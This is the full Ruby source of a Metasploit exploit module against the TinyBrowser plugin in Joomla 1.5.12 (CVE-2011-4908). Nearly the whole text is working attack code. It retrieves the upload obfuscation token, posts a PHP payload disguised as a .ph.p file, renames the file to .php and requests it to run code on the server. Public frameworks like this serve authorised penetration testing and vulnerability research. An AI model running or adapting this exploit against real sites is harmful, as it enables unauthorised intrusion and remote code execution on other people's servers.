Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Joomla 1.5.12 TinyBrowser File Upload Code Execution',
14
      'Description'    => %q{
15
          This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
16
        This plugin is not secured in version 1.5.12 of joomla and allows the upload
17
        of files on the remote server.
18
        By renaming the uploaded file this vulnerability can be used to upload/execute
19
        code on the affected system.
20
      },
21
      'Author'         => [ 'spinbad <spinbad.security[at]googlemail.com>' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          ['CVE', '2011-4908'],
26
          ['OSVDB', '64578'],
27
          ['EDB', '9296'],
28
          ['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
29
        ],
30
      'Privileged'     => false,
31
      'Payload'        =>
32
        {
33
          'DisableNops' => true,
34
          'Compat'      =>
35
            {
36
              'ConnectionType' => 'find',
37
            },
38
          'Space'       => 1024,
39
        },
40
      'Platform'       => 'php',
41
      'Arch'           => ARCH_PHP,
42
      'Targets'        => [[ 'Automatic', { }]],
43
      'DisclosureDate' => '2009-07-22',
44
      'DefaultTarget'  => 0))
45

46
      register_options(
47
        [
48
          OptString.new('URI', [true, "Joomla directory path", "/"]),
49
        ])
50
  end
51

52
  def check
53
    uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
54
    uri << '?type=file&folder='
55
    res = send_request_raw(
56
      {
57
        'uri' => uri
58
      }, 25)
59

60
    if (res and res.body =~ /flexupload.swf/)
61
      return Exploit::CheckCode::Appears
62
    end
63

64
    return Exploit::CheckCode::Safe
65
  end
66

67

68
  def retrieve_obfuscation()
69

70
  end
71

72

73
  def exploit
74

75
    cmd_php = '<?php ' + payload.encoded + '?>'
76

77
    # Generate some random strings
78
    cmdscript	= rand_text_alpha_lower(20)
79
    boundary    = rand_text_alphanumeric(6)
80

81
    # Static files
82
    directory 	= '/images/stories/'
83
    uri_base    = normalize_uri(datastore['URI'])
84
    uri_base << '/' if uri_base[-1,1] != '/'
85
    uri_base << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser'
86

87
    # Get obfuscation code (needed to upload files)
88
    obfuscation_code = nil
89

90
    res = send_request_raw({
91
      'uri'     => uri_base + '/upload.php?type=file&folder='
92
    }, 25)
93

94
    if (res)
95

96
      if(res.body =~ /"obfus", "((\w)+)"\)/)
97
        obfuscation_code = $1
98
        print_good("Successfully retrieved obfuscation code: #{obfuscation_code}")
99
      else
100
        print_error("Error retrieving obfuscation code!")
101
        return
102
      end
103
    end
104

105

106

107
    # Upload shellcode (file ending .ph.p)
108
    data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"
109
    data << "#{cmdscript}.ph.p\r\n--#{boundary}"
110
    data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
111
    data << "Content-Type: application/octet-stream\r\n\r\n"
112
    data << cmd_php
113
    data << "\r\n--#{boundary}--"
114

115
    res = send_request_raw({
116
      'uri'	  => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=",
117
      'method'  => 'POST',
118
      'data'    => data,
119
      'headers' =>
120
      {
121
        'Content-Length' => data.length,
122
        'Content-Type'	 => 'multipart/form-data; boundary=' + boundary,
123
      }
124
    }, 25)
125

126
    if (res and res.body =~ /File Upload Success/)
127
      print_good("Successfully Uploaded #{cmdscript}.ph.p")
128
    else
129
      print_error("Error uploading #{cmdscript}.ph.p")
130
    end
131

132

133
    # Complete the upload process (rename file)
134
    print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
135
    res = send_request_raw({
136
      'uri'     => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1'
137
    })
138

139

140
    # Rename the file from .ph.p to .php
141
    res = send_request_cgi(
142
      {
143
        'method'    => 'POST',
144
        'uri'       => uri_base + '/edit.php?type=file&folder=',
145
        'vars_post' =>
146
        {
147
          'actionfile[0]' => "#{cmdscript}.ph.p",
148
          'renameext[0]'   => 'p',
149
          'renamefile[0]' => "#{cmdscript}.ph",
150
          'sortby' => 'name',
151
          'sorttype' => 'asc',
152
          'showpage' => '0',
153
          'action' => 'rename',
154
          'commit' => '',
155
        }
156
      }, 10)
157

158
    if (res and res.body =~ /successfully renamed./)
159
      print_status("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
160
    else
161
      print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
162
    end
163

164

165
    # Finally call the payload
166
    print_status("Calling payload: #{cmdscript}.php")
167
    uri = normalize_uri(datastore['URI'])
168
    uri << '/' if uri[-1,1] != '/'
169
    uri << directory + cmdscript + ".php"
170
    res = send_request_raw({
171
      'uri'	=> uri
172
    }, 25)
173

174
  end
175
end
176

177